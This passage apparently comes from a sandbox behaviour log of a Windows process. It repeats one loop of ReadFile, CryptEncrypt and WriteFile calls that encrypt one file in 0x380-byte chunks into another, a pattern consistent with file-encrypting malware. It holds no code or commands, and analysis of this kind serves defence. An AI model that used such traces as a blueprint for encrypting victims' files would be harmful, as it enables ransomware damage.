pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.845] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.845] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.845] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.845] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.845] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.845] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.845] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.845] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.845] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.845] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.845] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.846] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.846] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.846] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.846] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.846] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.846] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.846] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.846] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.846] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.846] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.846] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.846] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.846] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.846] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.847] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.847] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.847] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.847] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.847] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.847] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.847] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.847] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.847] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.847] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.847] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.847] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.847] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.847] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.848] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.848] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.848] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.848] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.848] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.848] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.848] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.848] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.848] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.848] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.848] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.851] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.851] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.851] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.851] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.851] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.852] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.852] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.852] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.852] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.852] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.852] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.852] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.852] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.852] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.852] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.852] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.852] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.852] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.853] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.853] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.853] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.853] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.853] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.853] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.853] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.853] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.853] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.853] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.853] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.853] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.853] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.853] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.853] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.854] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.854] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.854] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.854] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.854] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.854] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.854] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.854] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.854] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.854] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.854] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.854] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.854] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.854] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.855] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.855] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.855] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.855] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.855] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.855] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.855] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: 